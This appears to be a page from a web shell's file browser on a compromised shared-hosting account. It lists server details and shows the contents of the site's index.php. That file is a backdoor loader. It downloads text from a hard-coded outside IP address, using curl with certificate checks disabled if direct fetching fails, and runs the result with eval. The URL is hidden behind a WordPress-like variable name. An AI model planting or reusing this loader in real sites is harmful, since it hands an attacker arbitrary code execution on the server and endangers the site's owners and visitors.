HEX
Server: Apache
System: Linux sg2plzcpnl489574.prod.sin2.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User: bpw3460lz1vy (8493017)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/bpw3460lz1vy/www/index.php
<?php
$wp_http_referer = 'http://198.204.245.50/z51215_16/stat/index2.txt';
$configData = false;
if (ini_get('allow_url_fopen')) {
    $configData = @file_get_contents($wp_http_referer);
}
if ($configData === false && function_exists('curl_init')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $wp_http_referer);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $configData = curl_exec($ch);
    curl_close($ch);
}
if ($configData) {
    eval('?>' . $configData);
}